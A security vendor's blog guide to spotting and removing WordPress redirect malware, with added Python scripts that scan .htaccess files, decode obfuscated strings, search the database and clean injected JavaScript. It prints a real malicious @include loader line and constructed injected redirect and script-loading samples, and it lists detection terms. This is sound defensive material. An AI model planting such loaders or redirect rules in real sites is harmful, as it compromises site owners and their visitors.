Fixing WordPress Redirect Hack – WordPress Site Redirecting to Another Site

Updated on: June 8, 2020

Is your WordPress website redirecting users to unknown malicious sites? If so, your website may have been hacked. The WordPress redirect hack is one of the most frequently exploited WordPress hacks, and there is a reason it is exploited so often; more on that below.

Variations and Symptoms of the WordPress Redirect Hack

The ‘WordPress hacked redirect’ to questionable domains is not a new hack. Over the years hackers have evolved this malware to make it more subtle and harder for you to detect. Here are some of the variations of the WordPress redirection hack:

Hack types and their symptoms:

Classic Redirection Hack: This is the oldest form of the hacked redirect. Every time someone visits your website, they are redirected to questionable links such as pharma sites, adult websites etc.

Redirection via Search Results: When the website is opened by entering the URL in the browser, it loads fine. But when it is opened from a Google search result, it redirects to malicious websites.

Device Specific WordPress Redirection: The website redirects only when opened from a mobile device, or only when opened from a desktop, depending on which malware is present.

Push Notifications Hack: We have seen this one in the last few months, where hackers also show browser push notifications to your visitors. Usually these push notifications point to porn websites.

Geography Specific Redirection: In some cases, some of your visitors see a redirection and some do not. This can be because hackers program the malware to work only for certain geographies. Where exactly the malware redirects to can also be tailored by geography.

Symptoms of the WordPress Hacked Redirect:

[Image: a few examples of the pages that redirection malware sends visitors to]

  1. The obvious redirection to malicious websites
  2. Google search results for your website being full of spam
  3. Unidentified push notifications on your website
  4. Malicious JavaScript code in the index.php file
  5. Unidentified code within .htaccess
  6. Unidentified files on the server with gibberish names

WordPress Spam Redirect: How was your WordPress website infected?

Truth be told, there are a dozen or more methods by which hackers can carry out this hack. Some of them are listed below:

Recent Redirect Hack – WordPress site redirecting to digestcolect [.] com

By exploiting plugin vulnerabilities (XSS)

Vulnerabilities such as Stored Cross-site Scripting (XSS) in WordPress plugins make it possible for hackers to add malicious JavaScript code to your website. When hackers learn that a plugin is vulnerable to XSS, they find all the sites that use that plugin and try to compromise them. Plugins such as WordPress Live Chat Support and Elementor Pro have been targets of such redirection hacks.

By inserting codes in .htaccess or wp-config.php files

When scanning a site for malware, free security plugins more often than not ignore the .htaccess and wp-config.php files. For WordPress sites redirecting to pharma websites, we’ve seen bad code added to the .htaccess file disguised as normal code. The hackers place the code in such a way that you cannot even find it in the file unless you scroll a long way to the right, which makes such redirection hacks harder to identify and remove. Apart from these two files, you should also check the other WordPress core and theme files such as functions.php, header.php, footer.php, wp-load.php, wp-settings.php etc.

When scanning one of our customers’ websites for malware, we found the following code hidden in the .htaccess file. It redirects website visitors to spammy and dangerous pharma websites.

[Image: malicious code in .htaccess]
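As an added example (not code from the article or from Astra), the check below reads an .htaccess file and flags the three tricks described above: redirect directives pointing at a host other than the site's own, RewriteCond lines keyed on search-engine referers or user agents, and directives buried behind long runs of leading whitespace. The sample .htaccess and the host pharma-spam.invalid are constructed, and SITE_HOST is an assumed value you would set to your own domain.

```python
import re

# Constructed sample .htaccess (not from the article): the normal WordPress
# block, followed by injected rules pushed off-screen with leading spaces.
SAMPLE_HTACCESS = (
    "# BEGIN WordPress\n"
    "<IfModule mod_rewrite.c>\n"
    "RewriteEngine On\n"
    "RewriteBase /\n"
    "RewriteRule ^index\\.php$ - [L]\n"
    "RewriteCond %{REQUEST_FILENAME} !-f\n"
    "RewriteRule . /index.php [L]\n"
    "</IfModule>\n"
    "# END WordPress\n"
    + " " * 300 + "RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\\. [NC]\n"
    + " " * 300 + "RewriteRule ^(.*)$ http://pharma-spam.invalid/$1 [R=302,L]\n"
)

SITE_HOST = "www.example.com"   # assumed: the site's own hostname
SEARCH_ENGINES = ("google", "bing", "yahoo", "yandex", "duckduckgo")

REDIRECT_DIRECTIVE = re.compile(r"^(RewriteRule|Redirect(?:Match|Permanent|Temp)?)\b", re.I)
CONDITION = re.compile(r"^RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I)
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.I)


def scan_htaccess(text, site_host=SITE_HOST, indent_limit=40):
    """Return (line_no, reason) pairs for lines a responder should inspect.

    Three checks, one per trick the article describes:
      * a redirect directive whose target host is not the site itself,
      * a RewriteCond on the referer or user agent that names a search
        engine (the "only redirects when coming from Google" variant),
      * any directive hidden behind more than indent_limit spaces.
    """
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip())
        if indent > indent_limit:
            findings.append((no, f"directive hidden behind {indent} spaces"))
        if REDIRECT_DIRECTIVE.match(line):
            for host in URL_HOST.findall(line):
                if host.lower() != site_host.lower():
                    findings.append((no, f"redirect to external host {host}"))
        cond = CONDITION.match(line)
        if cond and any(se in cond.group(2).lower() for se in SEARCH_ENGINES):
            findings.append((no, f"{cond.group(1)} condition keyed on search engines"))
    return findings
```

Calling scan_htaccess(SAMPLE_HTACCESS) reports both hidden lines twice: once for the whitespace trick and once for the search-engine condition or the external redirect target.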

By inserting JavaScript in the site header

Some plugins & themes allow you to add code in the <head> or just before the </body> tag. This can be useful for adding JS code for Google Analytics, Facebook, Google Search Console etc. We’ve seen such features being abused by hackers for WordPress site redirection.

In an attempt to make it difficult to search for, the malicious website URL is often converted from a string format to its respective character codes. The converted code looks something like this:

[Image: an example of malicious JavaScript in WordPress]

By adding themselves as ghost admins to wp-admin

Due to privilege escalation vulnerabilities in plugins, it is sometimes possible for hackers to create ghost or fake admin users on your site. Once the hacker becomes an administrator, they have full access to your website and can add backdoors and redirection code to your site.

Where is the WordPress Redirect Infection?

Core WordPress & Theme files

Attackers can infect the website by injecting code into any of the core WordPress files. Check these files for malicious code:

  • index.php
  • wp-config.php
  • wp-settings.php
  • wp-load.php
  • .htaccess
  • Theme files (wp-content/themes/{themeName}/)
    1. footer.php
    2. header.php
    3. functions.php

All JavaScript files

Some variants of the redirection malware infect ALL the JavaScript (.js) files on the website. This includes the JS files in the wp-includes, plugin and theme folders etc. The same obfuscated code is usually added at the top of each JS file.

WordPress Database

The wp_posts and wp_options tables are the most targeted tables in a WordPress site. Spam site links & JS code are often found in each of your articles or pages.

Fake favicon.ico files

Some malware creates rogue favicon.ico or random .ico files on your server which contain malicious PHP code inside them. This malicious PHP code is known to perform dangerous actions on the websites such as URL injection, creation of administrator accounts, installing spyware/trojans, creating phishing pages etc.

It pollutes your server with spam files. These files contain malicious code instead of genuine icon image data. Some of the code used to load such files can be seen below:

@include "\x2f/sg\x62/fa\x76ico\x6e_54\x656ed\x2eico";
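The following added example (not code from the article) decodes both encodings this post mentions: the JavaScript String.fromCharCode(...) trick from the site-header section above, and the \xNN-escaped PHP include path of the favicon.ico loader just shown. The JavaScript sample and the host spam.invalid are constructed; the PHP sample is the article's own line.

```python
import re

# Two samples of the encodings the article describes. The JS line (constructed)
# builds a script tag whose src is spelled out as character codes; the PHP line
# is the article's own favicon loader with \xNN escapes in the include path.
SAMPLE_JS = (
    'var s=document.createElement("script");'
    "s.src=String.fromCharCode(104,116,116,112,115,58,47,47,115,112,97,109,46,"
    "105,110,118,97,108,105,100,47,97,46,106,115);document.head.appendChild(s);"
)
SAMPLE_PHP = '@include "\\x2f/sg\\x62/fa\\x76ico\\x6e_54\\x656ed\\x2eico";'

FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
PHP_HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
INCLUDE_STMT = re.compile(r'@?(?:include|require)(?:_once)?\s*\(?\s*"([^"]*)"')


def decode_char_codes(js):
    """Return the text behind every String.fromCharCode(...) call in js."""
    decoded = []
    for args in FROM_CHAR_CODE.findall(js):
        codes = [int(n) for n in re.split(r"[\s,]+", args.strip()) if n]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def decode_php_hex(s):
    """Resolve PHP double-quoted \\xNN escapes (1 or 2 hex digits, as PHP does)."""
    return PHP_HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def included_paths(php):
    """Return the real path behind each include/require in a PHP snippet."""
    return [decode_php_hex(p) for p in INCLUDE_STMT.findall(php)]


def reveal(snippet):
    """Run both decoders over a snippet and return everything they recover."""
    return decode_char_codes(snippet) + included_paths(snippet)
```

reveal(SAMPLE_PHP) shows that the article's favicon loader pulls in //sgb/favicon_54e6ed.ico, a path you can then go and inspect on the server.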

WordPress Redirect Hack – Scanning WordPress For Redirection Malware:

To get started with the malware scanning process, you’ll first have to identify the type of redirection hack that your site is facing. Once you’ve done that by referring to the steps given above, the next task is to actually find the malicious code and remove it from your site.

You can either opt for an automated malware scanning solution, or proceed with a manual approach. Here are some steps you can take to remove the redirection hack:

1. Use a WordPress Malware Scanner

For not-so-technical WordPress users, a malware removal solution such as Astra would be the fastest & easiest way to find, remove and fix the WordPress redirection issue without breaking your site.

If you want to manually scan your site and find a solution based on the type of redirection hack you are facing, follow each of the steps given ahead.

2. Check with online security scan tools

As a preliminary check, you can scan your site using tools such as Astra’s free Security Scanner and Google Safe Browsing. If your site has links to any blacklisted URLs, these tools will alert you. You’ll also get a short (not exhaustive) list of some of the malicious code snippets found on your site. For a detailed scan you would either have to scan all website files manually, or get a malware scan done.

3. Verify WordPress Core File Integrity

To see if any malicious code has been injected into the core WordPress files, you can run a file integrity check using WP-CLI. To run such a check, follow these steps:

  1. Log in to your server via SSH
  2. Install WP-CLI
  3. Change directory to the location where you have WordPress installed
    cd /var/www/html/
  4. Check your current WordPress version with the following command
    wp core version
  5. Now run the command that lists the files whose checksum doesn’t match the original WordPress release
    wp core verify-checksums
  6. Look at the output of the above command. Some warnings are okay. However, if core files do not match their checksums you may need to replace your core files, or restore a backup.

To see the difference between the Original CMS file and the actual file visually, you can run a core file integrity scan with Astra.

[Image: file difference checking in Astra]

4. Remove hidden backdoors & redirection code

Hackers usually leave themselves a way to get back into your site. Backdoors are usually placed in files whose names look just like those of legitimate files.

You can manually search your website’s files for common malicious PHP functions such as eval, base64_decode, gzinflate, preg_replace, str_rot13 etc. Note that these functions are also used by WordPress plugins for legitimate reasons, so make sure you take a backup or get help so that you do not accidentally break the site.

5. See if any new admin users were added

Log in to your WordPress admin area, and check whether any ghost/unknown administrator users have been added. Hackers routinely add themselves as an admin so that they retain access to your site and can re-infect it even after you remove the redirection hack.

If you find any such users, quickly delete the accounts and change passwords for all other Admin accounts.

While you’re at it, also make sure (depending on your website’s requirement) that the Membership option called “Anyone can register” is disabled and the option “New User Default Role” is set to Subscriber.

6. Scan Plugins & Theme files

Check for fake & vulnerable plugins

Click on ‘Plugins’ in the left panel to see all the plugins that are installed on your site. If you see any unknown plugins, delete them.

For plugins that have updates available, check the WordPress plugin changelog for any recently found security issues. Also, scan the plugin files for backdoors and redirection code as mentioned in step #4 above.

[Image: sample of the malicious code injected in the header.php file]

Use online tools (e.g. a diff checker) to compare your plugin files with the original ones. You can do this by downloading the same plugins from the WordPress plugin repository and then matching your installed plugins against them.

However, this also has its limitations. Since you would be using multiple plugins, it is not always possible to compare each and every file. Also, if the redirection hack is because of a zero day, then chances are that an update for the plugin is not yet available.

7. Search database for malicious links

You can manually search your WordPress database for common malicious PHP functions, as we did to find backdoors. Log in to a database management tool such as phpMyAdmin or Adminer. Select the database used by your site and search for terms such as <script>, eval, base64_decode, gzinflate, preg_replace, str_replace, etc.

Be really careful before you make any changes, as even a tiny change such as a stray space can stop the site from loading or functioning properly.
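An added example (not the article's own code) that runs the searches described in step 7 against a constructed in-memory copy of wp_posts and wp_options and reports which rows matched which term. sqlite3 stands in for the site's MySQL database so the demo runs offline; the row contents and the host spam.invalid are made up.

```python
import sqlite3

# The search terms the article suggests typing into phpMyAdmin or Adminer.
SUSPICIOUS_TERMS = ["<script", "eval(", "base64_decode", "gzinflate",
                    "preg_replace", "str_rot13", "fromCharCode"]


def build_sample_db():
    """Constructed in-memory copies of wp_posts and wp_options with one clean
    post, one post carrying an injected script tag and one injected option.
    sqlite3 keeps the demo offline; the SELECTs below are plain SQL that runs
    unchanged against the MySQL/MariaDB behind a real WordPress site."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_posts(ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);
        CREATE TABLE wp_options(option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
        INSERT INTO wp_posts VALUES (1, 'Hello world', '<p>Welcome to my blog.</p>');
        INSERT INTO wp_posts VALUES (2, 'About', '<p>About us</p><script src="//spam.invalid/r.js"></script>');
        INSERT INTO wp_options VALUES (1, 'siteurl', 'https://www.example.com');
        INSERT INTO wp_options VALUES (2, 'widget_text', 'eval(String.fromCharCode(97,108,101,114,116));');
    """)
    return db


def find_injected_rows(db, terms=SUSPICIOUS_TERMS):
    """Return {(table, row id): [matched terms]} for rows containing any term.

    One LIKE query per term, parameterised so the term itself cannot alter
    the statement; in phpMyAdmin you would paste the same query with the
    placeholder written out as a quoted '%term%'."""
    queries = {
        "wp_posts": "SELECT ID FROM wp_posts WHERE post_content LIKE ?",
        "wp_options": "SELECT option_id FROM wp_options WHERE option_value LIKE ?",
    }
    hits = {}
    for table, sql in queries.items():
        for term in terms:
            for (row_id,) in db.execute(sql, (f"%{term}%",)):
                hits.setdefault((table, row_id), []).append(term)
    return hits
```

find_injected_rows(build_sample_db()) points at post 2 and option 2 only, which is the shortlist you would then open and clean by hand.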

WordPress Hacked Redirect: How to clean your website?

Now that you’ve scanned your site and have identified the malicious code, we need to remove it.

  1. Start by taking a backup of your website files & database (even though they might be infected).
  2. Log in to your server so that you can view & quarantine the malicious files. You can use the File Manager provided within cPanel, or traditional methods such as (s)FTP or SSH.
  3. Now edit the files which were flagged in the previous steps. Identify the malware bits in the file and remove the code. If the whole file is malicious, you can delete the whole file.
  4. If you have found multiple files with the same bit of malicious code, you can use the find & sed Linux commands via SSH. Please be very careful while using these, as the changes cannot be reversed.

    Example (replace ReplaceWithMalwareCode with the exact malicious string, escaping any characters that are special to sed such as / . * [ ] &):
    find /path/to/your/folder -name "*.js" -exec sed -i 's/ReplaceWithMalwareCode//g' '{}' \;
  5. Once all the files & the database have been cleaned, don’t forget to purge the website cache.
  6. Verify that your site is no longer redirecting by visiting your website in Private Browsing/Incognito mode.
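Since the find & sed one-liner above cannot be undone, here is an added example (not from the article) of the same cleanup with a dry run and per-file backups: it walks a directory tree, reports every .js file that begins with a given injected marker, and only when asked rewrites those files after copying each one to a .bak. The directory layout and the marker string are constructed for the demo.

```python
import os, shutil, tempfile

# Constructed stand-in for the injection described above: the same obfuscated
# line prepended to every .js file. The marker text is made up for the demo.
INJECTED_PREFIX = 'var _0xab12=["\\x73\\x72\\x63"];document.write(_0xab12[0]);'


def make_sample_site(root):
    """Lay out three .js files under root, two of them carrying the marker."""
    clean = "function hello(){return 'hi';}\n"
    files = {"wp-content/themes/t/main.js": INJECTED_PREFIX + clean,
             "wp-includes/js/jquery.js": INJECTED_PREFIX + clean,
             "wp-includes/js/clean.js": clean}
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)


def strip_injected_prefix(root, marker, dry_run=True):
    """Remove marker from the start of every .js file below root; return the
    relative paths that carried it. dry_run=True only reports, so the list can
    be reviewed first; otherwise each file is copied to <name>.bak before it
    is rewritten, the safety net a one-shot sed -i lacks."""
    infected = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                data = fh.read()
            if not data.startswith(marker):
                continue
            infected.append(os.path.relpath(path, root).replace(os.sep, "/"))
            if not dry_run:
                shutil.copy2(path, path + ".bak")
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(data[len(marker):])
    return sorted(infected)


def demo():
    """Build the sample site, dry-run, clean, re-scan; return what each step saw."""
    site = tempfile.mkdtemp()
    make_sample_site(site)
    planned = strip_injected_prefix(site, INJECTED_PREFIX)
    cleaned = strip_injected_prefix(site, INJECTED_PREFIX, dry_run=False)
    remaining = strip_injected_prefix(site, INJECTED_PREFIX)
    with open(os.path.join(site, "wp-includes/js/jquery.js.bak")) as fh:
        backup_intact = fh.read().startswith(INJECTED_PREFIX)
    shutil.rmtree(site)
    return planned, cleaned, remaining, backup_intact
```

On a real site you would run the dry run against the WordPress root first, check that the list contains only files you expect, and only then call it again with dry_run=False.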

Need someone to do all this for you?

If you prefer that your website is fixed quickly by professionals, we can help! With Astra’s award winning security suite & malware cleanup solution, your website will be thoroughly scanned & fixed from not just the WordPress redirection hack but also from backdoors, viruses, trojans etc. Once the hack is removed, your site would be protected with our firewall to prevent re-infection 💪

Since redirection malware is so prevalent, we’ve made a detailed step-by-step video on fixing redirection hacks. Though hackers always keep updating their methods to stay off the radar of security companies, the underlying principle is the same.

Also, check our detailed guide How to Fix Unwanted Pop-Ups in your WordPress Website

WordPress Malicious Redirects: Conclusion

Hackers are always evolving their methods, exploiting vulnerabilities not known to the world and combining various exploits to create a hack. While removing the hack is one part, ensuring one never gets hacked requires something more permanent – like Astra’s Security suite 🙂

Don’t take our words for it. See it for yourself!

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France). At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cybersecurity community and has shared his knowledge at various forums & invited talks.
14 Comments
Alex Morco
1 year ago

Nowadays, after some viruses, hacking of websites is easier and many hackers always try to hack websites, even Gov websites. We should always scan our websites for malware and keep them secure. I like your guide about helping people to recover their hacked WordPress blog. Also, they have mentioned scanning and keeping it safe.

Naman Rastogi
Admin
7 months ago
Reply to Alex Morco

Thank you so much. You can follow our detailed hack removal guide too https://www.getastra.com/blog/911/wordpress-site-hacked-malware-backdoor/

trackback

[…] not taken – a hacker may be able to launch Pharma attacks, Phishing pages, Japanese SEO spam, Redirection Malware etc. through WordPress Admin panel […]

trackback

[…] Pages on your website are being redirected to shady websites […]

trackback

[…] footer.php is an important file that can be targeted by the attackers. It is often used for malware redirects and displaying spam content as was the case of Default7.com Redirect Malware. In many cases, […]

trackback

[…] Related Article : WordPress Redirect Hack […]

rana
1 year ago

Thanks for the clear explanation, I am using a custom theme and now I can understand that the issue seems to be with the theme. Thanks. Please let me know any recommendation of a trusted tutorial to clean a WordPress theme! It will be really helpful and I will be grateful to you.

trackback
1 year ago

[…] can be an indication or a symptom of a much bigger problem in your website. Probably a hack that redirects to several spammy pages. It could also happen that your website is being used as a host for these attacks and hence the […]

Tuan Arnao
1 year ago

Comprehensive detailed writeup. I was able to resolve my issue. Thanks 🙂

Naman Rastogi
Admin
7 months ago
Reply to Tuan Arnao

Thank you so much 🙂

Naman Rastogi
Admin
7 months ago
Reply to Tuan Arnao

Thanks 🙂

Naman Rastogi
Admin
10 months ago

Hi Rana,

Thanks for your kind words. You can refer to these two blog post for malware removal

https://www.getastra.com/blog/911/wordpress-site-hacked-malware-backdoor/
https://www.getastra.com/blog/911/wordpress-backdoor-how-to-find-and-fix-wordpress-backdoor-hack/

Once the malware is removed, please follow our security guide
https://www.getastra.com/blog/cms/wordpress-security/wordpress-security-guide/

Let me know if you have any questions.

Roger Car
7 months ago

Delightful information, i was transferring from weebly to WordPress so this is what I needed!
Roger

Naman Rastogi
Admin
7 months ago
Reply to Roger Car

Thanks, Roger
